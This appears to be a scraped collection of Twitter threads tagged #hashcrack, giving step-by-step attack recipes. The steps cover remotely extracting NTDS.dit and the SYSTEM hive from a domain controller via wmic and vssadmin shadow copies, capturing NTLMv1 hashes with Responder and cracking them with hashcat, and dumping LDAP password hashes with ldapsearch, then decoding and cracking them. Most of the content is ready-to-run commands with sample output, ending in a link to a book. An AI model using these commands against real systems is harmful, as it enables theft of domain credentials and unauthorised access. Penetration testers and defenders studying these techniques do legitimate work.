Discover and read the best of Twitter Threads about #hashcrack


REMOTELY EXTRACT NTDS.DIT & SYSTEM hive

STEP 1: Use ‘wmi’ to execute ‘vssadmin’ to create new volume shadow copy:

wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
STEP 2: Extract ‘ntds.dit’ from the new volume shadow copy:

wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
STEP 3: Save off the SYSTEM hive from the registry:

wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\sys_backup.hiv 2>&1"
HOW TO EXTRACT NTLM HASH FROM NTLMv1 HASH:

STEP 1-Capture NTLMv1 hash with or without SSP using responder.
STEP 2-Download NTLMv1-Multi tool
github.com/evilmog/ntlmv1…
python ntlmv1.py --nossp <ntlmv1_hash_nossp>
python ntlmv1-ssp.py --ssp <ntlmv1_hash_ssp>
STEP 3-Add following DES hashes into hashes.txt:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

STEP 4-Load into Hashcat and crack:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
STEP 5-Cracked hashes.txt output:
727b4e35f947129e:1122334455667788:$HEX[8923bdfdaf753f63]
a52b9cdedae86934:1122334455667788:$HEX[17d741d7ddc1c36f]

STEP 6-Convert cracked DES into NT:
hashcat.net/wiki/doku.php?…
(1/3) DUMP LDAP PASSWORD HASHES:

STEP 1: Dump target user hash:

ldapsearch -x -h <LDAP_IPAddr> -D "cn=Directory Manager" -w <password> -b 'uid=<target_username>,cn=users,cn=accounts,dc=<DOMAIN>,dc=COM' uid userpassword krbprincipalkey sambalmpassword sambantpassword

#hashcrack
(2/3) DUMP LDAP PASSWORD HASHES:

STEP 2: The ‘userpassword::’ and ‘krbprincipalkey::’ hashes are base64 encoded, and now you need to decode them:

echo 'e1NTSEF9dHZEaUZ4ejJTUkRBLzh1NUZSSGVIT2N4WkZMci9OYktQNHNLNWc9PQ==' | base64 --decode

{SSHA}tvDiFxz2SRDA/8u5FRHeHOcxZFLr/NbKP4sK5g==
(3/3) DUMP LDAP PASSWORD HASHES:

STEP 3: Place your decoded hash into hash.txt file and fire up Hashcat mode ‘111’ and attempt to crack the password hash:

hashcat -a 0 -m 111 hash.txt dict.txt

amazon.com/dp/1793458618
#hashcrack